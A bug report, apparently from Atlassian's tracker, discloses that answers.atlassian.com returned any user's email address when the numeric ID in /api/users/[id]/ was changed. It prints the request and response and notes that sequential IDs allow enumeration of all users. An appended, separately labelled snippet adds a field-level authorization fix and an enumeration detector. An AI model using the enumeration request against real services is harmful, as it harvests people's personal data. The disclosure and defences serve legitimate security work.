Direct Object Reference - User Information Disclosure


    • Severity 3 - Minor

      NOTE: This bug report is for Confluence Server. Using Confluence Cloud? See the corresponding bug report.

      A direct object reference vulnerability exists on the answers.atlassian.com platform which allows a malicious user to obtain the email address of any user whose numeric ID they know.

      Additionally, since the IDs are incremental, it would be possible for an attacker to gain the email addresses of every single Atlassian Answers user.

      If the Atlassian Answers systems are linked with the main Atlassian identification system, it is likely that every Atlassian user's email address is exposed to any user.

      By making the following request, where [id] in the GET request path is modified, any user's email address can be obtained:

      GET /api/users/[id]/ HTTP/1.1
      Host: answers.atlassian.com
      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
      Accept: */*
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      X-CSRFToken: 6f6f820e0235bec839d1c48a049e4d89
      X-Requested-With: XMLHttpRequest
      Referer: https://answers.atlassian.com/questions/299003/
      Cookie: [redacted]
      Connection: keep-alive
      

      the following response is obtained:

      HTTP/1.1 200 OK
      Server: nginx
      Date: Mon, 26 May 2014 10:56:41 GMT
      Content-Type: application/json; charset=utf-8
      Connection: close
      Vary: Authorization,Cookie
      X-Frame-Options: SAMEORIGIN
      Content-Length: 581
      {
          "username": "[fullname]", 
          "website": "", 
          "about": "", 
          "links": {
              "badges": "/users/[id]/badges", 
              "self": "/users/[id]", 
              "questions": "/users/[id]/questions", 
              "answers": "/users/[id]/answers"
          }, 
          "tags": [], 
          "organisation": "Atlassian", 
          "answers": [no], 
          "id": [id], 
          "karma": [no], 
          "questions": 0, 
          "following": false, 
          "last_seen": "[date]", 
          "date_joined": "[date]", 
          "email": "*[email]*", 
          "badges": [no], 
          "location": ""
      }
      

      I was able to confirm that this vulnerability affects approximately 170,000 Atlassian users; however, I did not retrieve the details of accounts en masse.
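      As an added example that is not part of this report or of Atlassian's code: a profile serializer that applies the per-field authorization the endpoint above lacked, and a log check that flags a client walking consecutive user IDs. Field names follow the response above; the log line format, client addresses and window size are constructed assumptions.

```python
# Added example (not Atlassian's code): field-level authorization for a user
# profile endpoint, plus a detection check for sequential-ID enumeration.
import re
from collections import defaultdict

# Constructed sample record using the field names from the report's response.
USER = {"id": 1234, "username": "Example User", "organisation": "Atlassian",
        "email": "user@example.invalid", "karma": 10, "location": ""}

# Fields any authenticated caller may see; email is deliberately excluded.
PUBLIC_FIELDS = ("id", "username", "organisation", "karma", "location")


def serialize_user(record, requester_id, requester_is_admin=False):
    """Return only the profile fields the requester is allowed to see.

    The vulnerable behaviour in the report returned the whole record, email
    included, to any caller. Here email is included only when the requester
    owns the profile or is an administrator.
    """
    out = {k: record[k] for k in PUBLIC_FIELDS}
    if requester_id == record["id"] or requester_is_admin:
        out["email"] = record["email"]
    return out


# Constructed, simplified access-log shape: '<client> <user> "GET <path> HTTP/1.x" <status>'
LOG_RE = re.compile(r'^(\S+) \S+ "GET /api/users/(\d+)/ HTTP/1\.[01]" 200')


def detect_enumeration(log_lines, window=5):
    """Return clients that requested `window` or more consecutive user IDs."""
    seen = defaultdict(list)
    for line in log_lines:
        m = LOG_RE.match(line)
        if m:
            seen[m.group(1)].append(int(m.group(2)))
    flagged = []
    for client, ids in seen.items():
        ordered, run = sorted(set(ids)), 1
        for a, b in zip(ordered, ordered[1:]):
            run = run + 1 if b == a + 1 else 1
            if run >= window:
                flagged.append(client)
                break
    return flagged


# Constructed sample log: one client walks IDs 1000..1004, another makes two unrelated lookups.
SAMPLE_LOG = [f'203.0.113.7 alice "GET /api/users/{i}/ HTTP/1.1" 200' for i in range(1000, 1005)]
SAMPLE_LOG += ['198.51.100.9 bob "GET /api/users/42/ HTTP/1.1" 200',
               '198.51.100.9 bob "GET /api/users/7/ HTTP/1.1" 200']
```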

              Assignee:
              Dennis Kromhout van der Meer (Inactive)
              Reporter:
              Shubham
              Votes:
              0
              Watchers:
              5